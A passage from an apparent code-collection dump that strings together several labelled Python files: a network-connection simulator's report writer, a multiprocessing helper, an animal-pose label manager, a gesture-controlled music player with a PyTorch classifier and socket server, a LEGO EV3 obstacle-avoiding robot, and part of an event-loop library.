filehandle.write("Parameters:\n -N connections: %s\n -Inter arrival rate: %s(s)\n -Holding time: %s(s)\n" % (self.max_connections, lmb_inv, mu_inv))
for connection in self.log:
if connection.result == 'No spectrum':
spect_error = spect_error+1
elif connection.result == 'No route':
path_error = path_error + 1
elif connection.result == 'OK' and connection.type == 'CREATE':
created = created + 1
elif connection.result == 'OK' and connection.type == 'DELETE':
deleted = deleted + 1
elif connection.result != 'OK' and connection.type == 'DELETE':
delete_error = delete_error + 1
else:
print('Should not enter here')
print(connection)
if not connection.ber and connection.type == 'DELETE':
no_ber = no_ber + 1
filehandle.write("%s\t\t%s\t\t%s\t\t%s\t\t%s\t\t%s\t\t%s\n" % (connection.start_TS, connection.inter_arrival_time, connection.end_TS, connection.type, connection.result, connection.ber, connection.uuid))
filehandle.write("Successfully created: %s\n" % created)
filehandle.write("Successfully deleted: %s\n" % deleted)
filehandle.write("Spectrum error: %s\n" % spect_error)
filehandle.write("Path errors: %s\n" % path_error)
filehandle.write("Error deleting: %s\n" % delete_error)
filehandle.write("Error no BER: %s\n" % no_ber)
assert created+spect_error+path_error == self.max_connections
filehandle.write("Blocking probability: %s\n" % float((spect_error+path_error)/(created+spect_error+path_error)))
running_time = float(self.end_time-self.start_time)/1000
filehandle.write("%s connections in %s seconds\n" % (self.max_connections, running_time))
cps = self.max_connections/running_time
filehandle.write("%s connections created per second\n" % (created/running_time))
filehandle.write("Average interarrival time: %s\n" % cps)
filehandle.write("Average holding time: %s\n" % (self.total_holding_time/deleted))
filehandle.write("Erlangs: %s\n" % erlang)
print('WRITTEN')
# sys.argv[1] = IP@ to send the requests
# sys.argv[2] = Inter arrival time in seconds
# sys.argv[3] = Holding time in seconds
# sys.argv[4] = total number of requests
if __name__ == "__main__":
ip = sys.argv[1] + ':4900'
lmb_inv = float(sys.argv[2])
mu_inv = float(sys.argv[3])
connections = float(sys.argv[4])
total_holding_time = 0
lmb = 1/lmb_inv
mu = 1/mu_inv
erlang = lmb*mu_inv
print('Starting')
print('\tIp: {}'.format(ip))
print('\tInter arrival time: {} seconds --> Lambda: {}'.format(lmb_inv, lmb))
print('\tHolding time: {} seconds --> Mu: {}'.format(mu_inv, mu))
print('\tErlangs: {}'.format(erlang))
print('\tTotal connections: {}'.format(connections))
connectivity = Connectivity(lmb, connections)
input('Start?')
connectivity.start()
|
gmproc.py |
import multiprocessing as mp
import time
class Workers:
def __init__(self):
self.targets = {}
self.queue = mp.Queue()
self.results = {}
def add(self, id, target, params=None):
self.targets[id] = ProcessWrapper(id, target, params)
def set_params(self, id, new_value):
self.targets[id].params = new_value
def run(self, ids=None):
if ids is None:
ids = self.targets.keys()
prs = []
for k in ids:
p = self.targets[k]
pr = mp.Process(target=p.run, args=(p.id, self.queue, p.params))
prs.append(pr)
pr.start()
for _ in range(len(prs)):
id, value = self.queue.get()
self.results[id] = value
return self.results
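# Illustrative usage sketch (the worker function is made up):
#
#   def square(n):
#       return n * n
#
#   if __name__ == '__main__':   # guard needed on spawn-based platforms (e.g. Windows)
#       workers = Workers()
#       workers.add('a', square, 3)
#       workers.add('b', square, 4)
#       print(workers.run())     # -> {'a': 9, 'b': 16}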
def _run_client(cw, id, queue, params):
cw.run(id, cw.queue, queue, params)
def _run_server(sw, cqueue, queue, params):
sw.run(cqueue, queue, params)
class ClientServer:
def __init__(self, server, clients_delay = 0.1):
self.targets = {}
self.queue = mp.Queue()
self.results = {}
self.server = ServerWrapper(server)
self.clients_delay = clients_delay
def new_worker(self, id, worker_type, params=None):
self.targets[id] = ClientWrapper(id, worker_type, params)
def new_workers(self, nb_workers, worker_type, params=None):
for idx in range(nb_workers):
self.targets[idx] = ClientWrapper(idx, worker_type, params)
def set_params(self, id, new_value):
self.targets[id].params = new_value
def run(self, ids=None, params=None):
if ids is None:
ids = self.targets.keys()
cqueue = {}
for k in ids:
p = self.targets[k]
pr = mp.Process(target=_run_client, args=(p, p.id, self.queue, p.params))
cqueue[p.id] = p.queue
p.process = pr
pr.start()
ps = mp.Process(target=_run_server, args=(self.server, cqueue, self.queue, params))
ps.start()
time.sleep(self.clients_delay)
ps.join()
for k in ids:
c = self.targets[k]
# Join each client before closing its queue; the queues in cqueue are the
# same objects as c.queue, so one close per client is enough.
if c.process is not None:
c.process.join()
c.queue.close()
self.queue.close()
class ProcessWrapper:
def __init__(self, id, target, params=None):
self.id = id
self.target = target
self.params = params
def run(self, id, queue, params):
value = self.target(params)
queue.put( (id, value) )
class ClientWorker:
def __init__(self, id):
self.id = id
def start(self, params):
pass
def process(self):
pass
def update(self, response):
pass
def wait(self):
pass
def finish(self):
pass
def done(self):
return False
class ServerWorker:
def __init__(self):
pass
def start(self, params):
pass
def process(self, id, msg):
return None
def wait(self):
pass
def finish(self):
pass
def done(self):
return False
class ServerWrapper:
def __init__(self, target):
self.target = target
def run(self, cqueue, squeue, params):
obj = self.target()
obj.start(params)
while not obj.done():
id, msg = squeue.get()
response = obj.process(id, msg)
if response is not None:
cqueue[id].put(response)
obj.wait()
obj.finish()
class ClientWrapper(ProcessWrapper):
def __init__(self, id, target, params=None):
super().__init__(id, target, params)
self.queue = mp.Queue()
self.process = None
self.params = params
def run(self, id, cqueue, squeue, params):
obj = self.target(id)
obj.start(self.params)
while not obj.done():
msg = obj.process()
squeue.put( (id, msg) )
response = cqueue.get()
obj.update(response)
obj.wait()
obj.finish()
|
labels.py | import os
import shutil
import threading
import time
from functools import lru_cache
from glob import glob
from queue import SimpleQueue
from typing import Dict, Literal, Tuple, cast, Optional, List
import numpy as np
import pandas as pd
from fastapi import FastAPI
from ..utils import get_project_path, deepmerge, get_project_config, ProjectConfig
from ..utils.conversion import ensure_multi_index
# frame -> individual -> bodypart -> coords
LabelsCoords = Dict[Literal["x", "y"], Optional[float]]
LabelsBodyparts = Dict[str, LabelsCoords]
LabelsIndividuals = Dict[str, LabelsBodyparts]
LabelsModel = Dict[str, LabelsIndividuals]
LabelsGroups = Dict[Tuple[str, str], LabelsModel]
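# Illustrative shape of a LabelsModel value (names and numbers are made up):
#   {"img0001.png": {"individual1": {"nose": {"x": 12.5, "y": 40.0},
#                                    "tail": {"x": None, "y": None}}}}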
class LabelManager:
def __init__(self):
self.queue: "SimpleQueue[LabelsGroups]" = SimpleQueue()
self.shutdown_event = threading.Event()
def add(self, project: str, video: str, labels: LabelsModel):
self.queue.put({(project, video): labels})
def _worker(self):
while not self.shutdown_event.is_set():
groups: LabelsGroups = {}
for _ in range(self.queue.qsize()):
item = self.queue.get()
deepmerge(item, groups)
for (project, video), item in groups.items():
self.write_labels(project, video, item)
# write at most once per second
time.sleep(1)
@staticmethod
def get_labels(project, video) -> LabelsModel:
"""Retrieve labelled points of each frame for a given video."""
name = os.path.splitext(video)[0]
paths = glob(
get_project_path(project, "labeled-data", name, f"CollectedData_*.h5")
)
if len(paths) == 0:
return {}
if len(paths) == 1:
path = paths[0]
else:
config = get_project_config(project)
if not config:
return {}
path = get_project_path(
project, "labeled-data", name, f"CollectedData_{config.scorer}.h5"
)
if not os.path.exists(path):
return {}
df: pd.DataFrame = cast(pd.DataFrame, pd.read_hdf(path)).replace({np.nan: None})
output = {}
multi_animal = "individuals" in df.columns.names
for image in df.index:
# support old data format
if not isinstance(df.index, pd.MultiIndex):
image_name = os.path.basename(image)
else:
image_name = image[-1]
output.setdefault(image_name, {})
if multi_animal:
for i in range(0, len(df.columns), 2):
individual = df.columns[i][1]
bodypart = df.columns[i][2]
output[image_name].setdefault(individual, {})
output[image_name][individual][bodypart] = {
"x": df.loc[image][df.columns[i]],
"y": df.loc[image][df.columns[i + 1]],
}
else:
output[image_name]["individual1"] = {
df.columns[i][1]: {
"x": df.loc[image][df.columns[i]],
"y": df.loc[image][df.columns[i + 1]],
}
# iterate by 2's, so we can grab x,y pairs
for i in range(0, len(df.columns), 2)
}
return output
@staticmethod
def get_labelled_count(labels: LabelsModel) -> int:
"""Returns the number of frames which have at least one point labelled."""
def has_labels(frame_: str) -> bool:
for bodyparts in labels[frame_].values():
if any(c["x"] or c["y"] for c in bodyparts.values()):
return True
return False
count = 0
for frame in labels:
if has_labels(frame):
count += 1
return count
@staticmethod
def _reindex_dataframe(
labels: LabelsModel,
config: ProjectConfig,
name: str,
df: Optional[pd.DataFrame] = None,
):
images = [("labeled-data", name, image) for image in labels]
if df is not None:
images = list(set(images) - set(df.index))
if not images:
return df
new_df: Optional[pd.DataFrame] = None
a = np.empty((len(images), 2))
a[:] = np.nan
for individual in config.individuals or ["individual1"]:
for bodypart in config.bodyparts:
if config.multi_animal:
cols = pd.MultiIndex.from_product(
[[config.scorer], [individual], [bodypart], ["x", "y"]],
names=["scorer", "individuals", "bodyparts", "coords"],
)
else:
cols = pd.MultiIndex.from_product(
[[config.scorer], [bodypart], ["x", "y"]],
names=["scorer", "bodyparts", "coords"],
)
index = pd.MultiIndex.from_tuples(images)
frame = pd.DataFrame(a, columns=cols, index=index)
new_df = pd.concat([new_df, frame], axis=1)
if df is not None:
new_df = pd.concat([df, new_df], axis=0)
new_df.sort_index(inplace=True)
return new_df
def write_labels(self, project, video, labels: LabelsModel):
name = os.path.splitext(video)[0]
base_path = get_project_path(project, "labeled-data", name)
backup_path = os.path.join(base_path, "backups")
config = get_project_config(project)
if not config:
raise Exception(f"config file missing for project: '{project}'")
scorer = config.scorer
path_hdf = os.path.join(base_path, f"CollectedData_{scorer}.h5")
path_csv = os.path.join(base_path, f"CollectedData_{scorer}.csv")
os.makedirs(backup_path, exist_ok=True)
df: Optional[pd.DataFrame]
if os.path.exists(path_hdf):
# load dataframe from disk
df = cast(pd.DataFrame, pd.read_hdf(path_hdf))
ensure_multi_index(df)
# add new images to dataframe
df = self._reindex_dataframe(labels, config, name, df)
else:
# create new data frame
df = self._reindex_dataframe(labels, config, name)
if df is None:
return
for image, individuals in labels.items():
image_path = ("labeled-data", name, image)
for individual, bodyparts in individuals.items():
for bodypart, coords in bodyparts.items():
for coord, value in coords.items():
if config.multi_animal:
key = (scorer, individual, bodypart, coord)
else:
key = (scorer, bodypart, coord)
df.loc[image_path, key] = value
# create backups before writing the files
def create_backup(path, suffix, overwrite=False):
if not os.path.exists(path):
return
backup_target = os.path.join(backup_path, os.path.basename(path) + suffix)
if overwrite or not os.path.exists(backup_target):
shutil.copy2(path, backup_target)
create_backup(path_hdf, ".original")
create_backup(path_csv, ".original")
create_backup(path_hdf, ".bak", overwrite=True)
create_backup(path_csv, ".bak", overwrite=True)
# save to disk
df.to_csv(path_csv)
df.to_hdf(path_hdf, "df_with_missing")
def _start(self):
threading.Thread(target=self._worker).start()
def _close(self):
self.shutdown_event.set()
def register_events(self, app: FastAPI):
app.add_event_handler("startup", self._start)
app.add_event_handler("shutdown", self._close)
@lru_cache()
def get_label_manager():
return LabelManager()
|
music_player.py | import os
from typing import List
from numpy.lib.function_base import msort
from pygame import mixer
from random import shuffle, triangular
from tkinter import Listbox, Tk, Button, Label
import socket
import time
import torch
import numpy as np
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader
from threading import Thread
class Classifier(nn.Module):
def __init__(self):
super(Classifier, self).__init__()
self.layer1 = nn.Linear(600, 1024)
self.layer2 = nn.Linear(1024, 256)
self.layer3 = nn.Linear(256, 64)
self.out = nn.Linear(64, 17)
self.act_fn = nn.ReLU()
def forward(self, x):
x = self.layer1(x)
x = self.act_fn(x)
x = self.layer2(x)
x = self.act_fn(x)
x = self.layer3(x)
x = self.act_fn(x)
x = self.out(x)
return x
def get_device():
return 'cuda' if torch.cuda.is_available() else 'cpu'
model_path = (r"C:\Users\jscmb\es_data\model.ckpt") #change this path to where you store the model.ckpt
device = get_device()
print("device:", device)
model = Classifier().to(device)
model.load_state_dict(torch.load(model_path, map_location=device))
# Initialize the window and the mixer
window = Tk()
window.title("Easy music player with gesture detection")
mixer.init()
song_box = Listbox(window, bg = 'black', fg = 'green', width = 60)
# song_box.pack(pady = 60)
# get list of files
os.chdir(r"C:\Users\jscmb\songs") #change this to your song list's direction
playlist = os.listdir()
active_playlist = playlist
shuffled_playlist = []
nonshuffled_playlist = playlist
# Get number of files
file_range = len(playlist) - 1
# Settings variables used to control play logic
music_option = True
shuffle_music = False
indexed_track = 0
display_track = indexed_track + 1
is_stopped = False
is_paused = False
is_started = False
repeat_track = False
stop_reacting = False
def volumedown():
volume = mixer.music.get_volume()
if volume >= 0.1:
volume = volume - 0.1
else:
volume = 0
# volume = volume - 1.0
mixer.music.set_volume(volume)
print("Set volume to ", mixer.music.get_volume())
def volumeup():
volume = mixer.music.get_volume()
volume = min(volume + 0.1, 1.0)
# volume = volume - 1.0
mixer.music.set_volume(volume)
print("Set volume to ", mixer.music.get_volume())
# Shuffle music logic
def shuffle_playlist():
global shuffle_music, playlist, is_started, shuffled_playlist, indexed_track, is_stopped, active_playlist
indexed_track = 0
if shuffle_music:
shuffle_music = False
active_playlist = playlist
else:
shuffle_music = True
shuffle(playlist)
shuffled_playlist = playlist
os.chdir(r"C:\Users\jscmb\songs") #change this to your song list's direction
playlist = os.listdir()
update_display()
mixer.music.pause()
start_music()
# Repeat one or all logic
def repeat_loop():
global repeat_track
if not repeat_track:
repeat_track = True
repeat_button.config(text="🔂")
else:
repeat_track = False
repeat_button.config(text="🔁")
# Updates the display values of the current track number and name
def update_display():
global display_track
display_track = playlist.index(active_playlist[indexed_track]) + 1
track_num_display.config(text=f"Track: {display_track}")
track_name_display.config(text=f"Now Playing:\n{active_playlist[indexed_track]}")
music_playing = music_status()
if music_playing:
start_button.config(text="⏸️")
# Otherwise show the play symbol
else:
start_button.config(text="▶️")
# Logic to run music
def start_music():
global indexed_track, is_started, is_stopped, active_playlist
# Determine if random or normal play
if shuffle_music:
active_playlist = shuffled_playlist
else:
active_playlist = playlist
# If music is not already playing, it has not been stopped or paused then grabs next song in queue
while not mixer.music.get_busy() and not is_stopped and not is_paused and not is_started:
mixer.music.load(active_playlist[indexed_track])
mixer.music.play()
is_started = True
# While music is playing check every 100 milliseconds if music track has finished playing and re-trigger music.
if mixer.music.get_busy():
window.after(100, start_music)
else:
# Repeat logic
if not is_paused:
# Repeat one logic reduce index call by 1 prior to adding 1 so always stay on same track
if repeat_track:
indexed_track -= 1
# Else it is repeating all
indexed_track += 1
is_started = False
# Checks to make sure track is not skipped past last song or into negative.
if indexed_track < 0 or indexed_track > file_range:
indexed_track = 0
# Update the display with current track info
update_display()
# Repeat music
start_music()
# Gets the current status of the music player
def music_status():
music_yes = mixer.music.get_busy()
return music_yes
# Stop the music from playing. If already stopped then it resets repeat status and the playlist
def stop_music():
global is_stopped, is_started, indexed_track, repeat_track
if is_stopped:
indexed_track = 0
repeat_track = False
update_display()
mixer.music.stop()
is_stopped = True
is_started = False
start_music()
# Skip to next track
def next_track():
global indexed_track, is_started, is_paused
# If music is playing stop it and move it to the next track and start again
is_paused = False
mixer.music.stop()
if indexed_track == file_range:
indexed_track = 0
is_started = False
start_music()
update_display()
# Skip to last track
def prev_track():
global indexed_track, is_started, is_paused
# If music is playing stop it move to prior track or if on first track move to last track.
is_paused = False
if display_track == 1:
indexed_track = file_range
is_started = False
else:
indexed_track -= 2
mixer.music.stop()
start_music()
update_display()
# Play or pause logic
def play_track():
global is_paused, is_stopped
music_playing = music_status()
# If music is playing then pause it and mark the paused flag as True
if music_playing:
is_paused = True
mixer.music.pause()
start_button.config(text="▶️")
# Else it was paused so unpause and mark paused flag as False
else:
is_paused = False
mixer.music.unpause()
start_button.config(text="⏸️")
# Mark stopped as False and start music
is_stopped = False
start_music()
# When the user is not interacting with the UI, refresh the display periodically
def update_status():
update_display()
window.after(1000, update_status)
window.after(1000, update_status)
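# update_status re-schedules itself every second via Tkinter's after(), so the track number
# and title stay in sync even when playback advances without any button presses.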
# Control buttons
previous_button = Button(text="⏮", font=("", 12, ""), command=prev_track)
previous_button.grid(row=2, column=0)
start_button = Button(text="⏯", font=("", 12, ""), command=play_track)
start_button.grid(row=2, column=1)
next_button = Button(text="⏭", font=("", 12, ""), command=next_track)
next_button.grid(row=2, column=2)
repeat_button = Button(text="🔄", font=("", 12, ""), command=repeat_loop)
repeat_button.grid(row=3, column=3)
shuffle_button = Button(text="🔀", command=shuffle_playlist)
shuffle_button.grid(row=3, column=2)
volume_up_button = Button(text = "🔊", font=("", 12, ""), command=volumeup)
volume_up_button.grid(row=3, column=1)
volume_down_button = Button(text = "🔈", font=("", 12, ""), command=volumedown)
volume_down_button.grid(row=3, column=0)
# Displayed information
track_num_display = Label(text=f"Track: {display_track}")
track_name_display = Label(text=f"Now Playing:\n{active_playlist[indexed_track]}")
track_num_display.grid(row=0, column=1, columnspan=2)
track_name_display.grid(row=1, column=0, columnspan=4)
HOST = '172.20.10.13' # Address to listen on; change this to the Wi-Fi IP address of the machine running this player
PORT = 65431 # Port to listen on (use ports > 1023)
class music_player(Thread):
def __init__(self):
Thread.__init__(self)
self.daemon = True
self.start()
def run(self):
while True:
window.update_idletasks()
window.update()
def server_socket():
global stop_reacting
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((HOST, PORT))
sample_num = 0
s.listen(1)
print("listening...")
conn, addr = s.accept()
print('Connected by', addr)
with conn:
music_playing = music_status()
if not music_playing:
mixer.music.load(active_playlist[indexed_track])
mixer.music.play()
while True:
print("Connected! Waiting for data...")
count = 0
data = []
try:
N = int(conn.recv(1024).decode('utf-8'))
except:
print('Invalid length header received; restarting the read loop.')
continue
while count < N:
temp = conn.recv(1024).decode('utf-8')
#print('Received from socket server : ', temp)
temp = temp.split()
for i in range(len(temp)):
data.append(int(temp[i]))
count += int(len(temp)/3)
sample_num += 1
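# Pad the reading out to exactly 600 values by cycling the last 3-value sample (presumably
# one 3-axis reading), so the input matches the classifier's 600-feature input layer.
# Readings longer than 600 values are rejected below.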
for j in range(len(data), 600):
data.append(data[-3])
if len(data) > 600:
print("Your Gasture is too long to detected! Please try again.")
else:
# with open(r"C:\Users\jscmb\es_data\data_LTb.txt", "a") as dt:
# for i in data:
# dt.write(str(i))
# dt.write(" ")
data = np.array(data)
data = torch.from_numpy(data).float()
output = model(data)
_, data_pred = torch.max(output, 0)
data_pred = int(data_pred)
print(data_pred)
if not stop_reacting:
if data_pred == 0:
prev_track()
print("Gasture detected: last song")
elif data_pred == 1:
next_track()
print("Gasture detected: next song")
elif data_pred == 2:
volumeup()
print("Gasture detected: volume up")
elif data_pred == 3:
volumedown()
print("Gasture detected: volume down")
elif data_pred == 4:
play_track()
music_playing = music_status()
if music_playing:
print("Gasture detected: play")
else:
print("Gasture detected: pause")
elif data_pred == 5:
repeat_loop()
if repeat_track:
print("Gasture detected: repeat song")
else:
print("Gasture detected: not repeat song")
elif data_pred == 6:
shuffle_playlist()
if shuffle_music:
print("Gasture detected: random playlist")
else:
print("Gasture detected: ordered playlist")
elif data_pred == 7:
stop_reacting = True
print("Gasture detected: you've stop to detect the gesture, waving the stop gesture again to enable the detection")
elif data_pred == 8:
print("Gasture detected: equalizer setting 1")
elif data_pred == 9:
print("Gasture detected: equalizer setting 2")
elif data_pred == 10:
print("Gasture detected: equalizer setting 3")
else:
if data_pred == 7:
stop_reacting = False
print("Gasture detected: you've enable the gesture detection")
else:
print("You've stop to detect the gesture, waving the stop gesture again to enable the detection")
if __name__ == "__main__":
t2 = Thread(target = server_socket)
t2.daemon = True  # Thread.setDaemon() is deprecated in favor of the daemon attribute
t2.start()
window.mainloop()
while True:
print("somthing wrong...")
pass |
main.py | #!/usr/bin/env pybricks-micropython
from pybricks import ev3brick as brick
from pybricks.ev3devices import Motor, TouchSensor, UltrasonicSensor, GyroSensor
from pybricks.parameters import Port, Direction, Color
from pybricks.tools import print, wait
from pybricks.robotics import DriveBase
from threading import Thread
from server import *
import socket
import sys
run = True
def main():
drive_speed = 200
s3.reset_angle(0)
# half_scan = [45, -90, 45]
half_scan = [45, -45]
# full_scan = [90, -45, -90, -45, 90]
full_scan = [90, 45, -45, -90]
while run == True:
if s1.pressed() == True:
wait(1000)
t = Thread(target=batterychk)
t.start()
robot.drive(drive_speed, 0)
# TODO: check the gyro angle and slow one motor or the other to keep the robot driving straight
while run == True:
# if s2.distance() < 300:
# print("Detected obsticle ahead {}".format(s2.distance()))
# robot.stop()
# direction = vision_scan(type = "full", scan_lst = [90, -45, -45, -45, -45])
# print(type(direction))
# print("returned {}".format(direction))
# avoid_obs(direction)
# robot.drive(drive_speed, 0)
result = vision_scan(type="half", center_pt=45, scan_lst=half_scan)
print(result)
if result == "None":
pass
elif -5 < result < 5:
# a reading close to 0 degrees means the obstacle is straight ahead
print("Detected obstacle ahead {}".format(s2.distance()))
robot.stop()
direction = vision_scan(type="full", center_pt=90, scan_lst=full_scan)
# print(type(direction))
# print("returned {}".format(direction))
avoid_obs(direction)
robot.drive(drive_speed, 0)
elif -50 < result < -40:
avoid_obs(direction=45)
elif 40 < result < 50:
avoid_obs(direction=-45)
# while s3.angle() != 0:
# print("Not straight")
# if s3.angle() < 0:
# robot.drive(0, -150)
# else:
# robot.drive(0, 150)
# robot.drive(drive_speed, 0)
wait(700)
def control_srv():
# Create a TCP/IP socket
# ipaddr = socket.socket.gethostbyname(socket.gethostname())
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# print(ipaddr)
# Bind the socket to the port
serversocket.bind(("192.168.1.165", 8000))
# print('starting up on %s port %s' % server_address)
serversocket.listen(5)
while True:
# establish a connection
clientsocket, addr = serversocket.accept()
print("Got a connection from %s" % str(addr))
msg = 'Thank you for connecting' + "\r\n"
clientsocket.send(msg.encode('ascii'))
# clientsocket.close()
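# vision_scan sweeps the ultrasonic sensor (mounted on the 'center' motor) across the angles
# in scan_lst, recording a distance reading at each position plus one near 0 degrees after
# re-centering.
# type == "full": returns the angle with the largest measured distance (the clearest direction).
# otherwise:      returns the first angle whose reading is below 500 mm, or the string "None"
#                 if nothing is that close.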
def vision_scan(type=None, center_pt=None, scan_lst=None):
# print(scan_lst)
motor_speed = 150
wait_time = 10
# center.reset_angle(0)
# turn_degree = 90
# scan_lst = [90, -45, -45, -45, -45]
dist_lst = {}
for line in scan_lst:
# print("Scan {}".format(line))
center.run_target(motor_speed, line)
wait(10)
# angle_dif = line - center.angle()
# print(angle_dif)
# center.run_angle(motor_speed, angle_dif)
# wait(10)
dist_lst[center.angle()] = s2.distance()
wait(10)
center.run_target(motor_speed, 0)
# wait(10)
# if center.angle() < 0:
# center.run(150)
# while center.angle() < 0:
# wait(1)
# elif center.angle() > 0:
# center.run(-150)
# while center.angle() > 0:
# wait(1)
# center.stop()
# wait(10)
angle_diff = 0 - center.angle()
print(angle_diff)
center.run_target(motor_speed, angle_diff)
dist_lst[center.angle()] = s2.distance()
# wait(10)
# print(dist_lst)
if type == "full":
result = max(dist_lst.values())
for key, value in dist_lst.items():
if result == value:
return key
else:
print(dist_lst)
for key in dist_lst:
print(dist_lst[key])
if dist_lst[key] < 500:
return key
else:
pass
return "None"
def avoid_obs(direction=None):
s3.reset_angle(0)
print("Current Angle: {}".format(s3.angle()))
robot.drive_time(-150, 0, 1000)
if direction > 0:
robot.drive(0, -150)
while direction > s3.angle():
# pass
wait(1)
else:
robot.drive(0, 150)
while direction < s3.angle():
# pass
wait(1)
robot.drive(200, 0)
return
def batterychk():
global run  # without this, the assignment below would only create a local variable
while True:
print("Battery level {}".format(brick.battery.voltage()))
if brick.battery.voltage() < 5000:
run = False
robot.stop()
print("Battery Low {}".format(brick.battery.voltage()))
brick.display.text("Battery Low", (60, 50))
while True:
brick.light(Color.RED)
brick.sound.beep()
wait(500)
brick.light(None)
brick.sound.beep()
# brick.sound.speak("Battery Low")
wait(500)
wait(2000)
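# Note: in the __main__ block below, main() is commented out and only control_srv() is
# started, so the robot currently runs just the TCP greeting server; re-enable main() to
# start the autonomous drive loop.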
if __name__ == "__main__":
# Setup ports
left = Motor(Port.B, Direction.COUNTERCLOCKWISE)
right = Motor(Port.A, Direction.COUNTERCLOCKWISE)
center = Motor(Port.D, Direction.CLOCKWISE)
robot = DriveBase(left, right, 56, 114)
s1 = TouchSensor(Port.S2)
s2 = UltrasonicSensor(Port.S1)
s3 = GyroSensor(Port.S3)
# main()
# rotation_chk()
control_srv()
# print(vision_scan(type="full", scan_lst=[90, -45, -45, -45, -45, 90]))
# print(vision_scan(type="half", scan_lst=[45, -45, -45, 45]))
|
__init__.py | # -*- coding: utf-8 -*-
# Copyright (c) Sebastian Klaassen. All Rights Reserved.
# Distributed under the MIT License. See LICENSE file for more info.
import abc
import collections
import collections.abc
import datetime
import enum
import inspect
import logging
import sys
import threading
import os
import queue
import warnings
__all__ = [
'all_', 'animate', 'any_', 'Awaitable', 'AbstractEventLoop', 'Event',
'find_parent', 'Frame', 'FrameMeta', 'FrameStartupBehaviour',
'FreeEventArgs', 'get_current_eventloop_index', 'InvalidOperationException',
'hold', 'PFrame', 'Primitive', 'sleep'
]
__version__ = '2.2.0'
class ThreadLocals(threading.local):
def __init__(self):
self.__dict__['_current_eventloop'] = None
self.__dict__['_current_frame'] = None
_THREAD_LOCALS = ThreadLocals()
class FrameStartupBehaviour(enum.Enum):
delayed = 1
immediate = 2
class InvalidOperationException(Exception):
"""Raised when operations are performed out of context.
Args:
msg (str): Human readable string describing the exception.
"""
def __init__(self, msg):
super().__init__(msg)
class FreeEventArgs(object):
"""Event arguments returned by the :attr:`Frame.free` event.
Attributes:
cancel (bool): Setting this to True, cancels the event.
"""
def __init__(self):
self.cancel = False
class _AtomicCounter(object):
"""A thread-safe counter that calls a function whenever it hits zero.
Args:
initial_value (int): The initial counter value.
on_zero (Callable): The function to call whenever the counter hits zero.
"""
def __init__(self, initial_value, on_zero):
self._lock = threading.Lock()
self._value = initial_value
self.on_zero = on_zero
self.on_zero_args = ()
def add(self, f):
"""Increment the counter by the given amount."""
with self._lock:
self._value += f
if self._value != 0: return
self.on_zero(*self.on_zero_args)
def sub(self, f):
"""Decrement the counter by the given amount."""
with self._lock:
self._value -= f
if self._value != 0: return
self.on_zero(*self.on_zero_args)
class AbstractEventLoop(metaclass=abc.ABCMeta):
"""Abstract base class of event loops."""
@abc.abstractmethod
def _run(self):
"""Start the newly created or stopped event loop.
This method must be overwritten by the concrete eventloop class.
Events can be posted or invoked before the eventloop is started.
"""
raise NotImplementedError # pragma: no cover
@abc.abstractmethod
def _stop(self):
"""Stop the running event loop.
This method must be overwritten by the concrete eventloop class.
"""
raise NotImplementedError # pragma: no cover
@abc.abstractmethod
def _close(self):
"""Close the stopped event loop.
This method must be overwritten by the concrete eventloop class.
The eventloop will not be restarted and no events will be posted or invoked after this method is called.
"""
raise NotImplementedError # pragma: no cover
@abc.abstractmethod
def _clear(self):
"""Clear all pending events from the stopped event loop.
This method must be overwritten by the concrete eventloop class.
"""
raise NotImplementedError # pragma: no cover
@abc.abstractmethod
def _post(self, delay, callback, args):
"""Execute the given callback after ``delay`` seconds.
This method must be overwritten by the concrete eventloop class.
This function is **not** threadsafe. It is only called from the thread that this eventloop was started on.
See :meth:`AbstractEventLoop._invoke` for the threadsafe version of this method.
Args:
delay (float): The time to wait before executing the callback.
callback (function): The function to be called.
args (tuple): The arguments to pass to the callback.
"""
raise NotImplementedError # pragma: no cover
@abc.abstractmethod
def _invoke(self, delay, callback, args):
"""Execute the given callback after ``delay`` seconds.
This method must be overwritten by the concrete eventloop class.
This function **is** threadsafe. It can be called from any thread.
See :meth:`AbstractEventLoop._post` for the unsafe version of this method.
Args:
delay (float): The time to wait before executing the callback.
callback (function): The function to be called.
args (tuple): The arguments to pass to the callback.
"""
raise NotImplementedError # pragma: no cover
def _spawnthread(self, target, args):
"""Create and start a daemonic worker thread.
By default, this will create and start a ``threading.Thread``.
The concrete eventloop class can overwrite this method to use a different threading model.
Args:
target (function): Same as the ``target`` argument of ``threading.Thread``.
args (tuple): Same as the ``args`` argument of ``threading.Thread``.
Returns:
The created thread.
"""
thread = threading.Thread(target=target, args=args, daemon=True)
thread.start()
return thread
def _jointhread(self, thread):
"""Wait until the given thread terminates.
Only threads created with :meth:`AbstractEventLoop._spawnthread` are awaited with this method.
Args:
thread: The thread to wait for.
"""
thread.join()
def __init__(self):
self._idle = True
self._eventloop_affinity = self
self._result = None
self._exception = None
def run(self, frame, *frameargs, num_threads=0, **framekwargs):
if num_threads <= 0: # If no specific number of threads was requested, ...
# Default num_threads to the number of available CPU cores
try:
# Try to get the number of available CPU cores this process is restricted to
num_threads = len(os.sched_getaffinity(0))
except:
num_threads = 0
if num_threads <= 0: # If the number of CPU cores couldn't be determined, ...
try:
# Try to get the number of available CPU cores
import multiprocessing
num_threads = multiprocessing.cpu_count()
except:
num_threads = 0
if num_threads <= 0: # If the number of CPU cores still couldn't be determined, ...
num_threads = 4 # Fall back to 4 threads
if _THREAD_LOCALS._current_eventloop is not None:
raise InvalidOperationException("Another event loop is already running")
_THREAD_LOCALS._current_eventloop = self
eventloop_queue = queue.Queue()
self.event_queue = queue.Queue()
def worker_thread(parent_eventloop):
eventloop = parent_eventloop.__class__()
eventloop.event_queue = parent_eventloop.event_queue
_THREAD_LOCALS._current_eventloop = eventloop
eventloop_queue.put(eventloop)
eventloop._run()
eventloop._close()
workers = [self._spawnthread(target=worker_thread, args=(self,)) for i in range(num_threads - 1)]
# Collect an array of all eventloops and distribute that array among all eventloops
self.eventloops = [self]
for worker in workers: self.eventloops.append(eventloop_queue.get())
for eventloop in self.eventloops[1:]: eventloop.eventloops = self.eventloops
self._idle = False
self._result = None
self._exception = None
try:
mainframe = frame(*frameargs, **framekwargs)
if not mainframe.removed:
mainframe._listeners.add(self) # Listen to mainframe finished event
self._run()
except:
raise
else:
if self._exception:
raise self._exception
else:
return self._result
finally:
_THREAD_LOCALS._current_eventloop = None
_THREAD_LOCALS._current_frame = None
# Clear event queue
while True:
try:
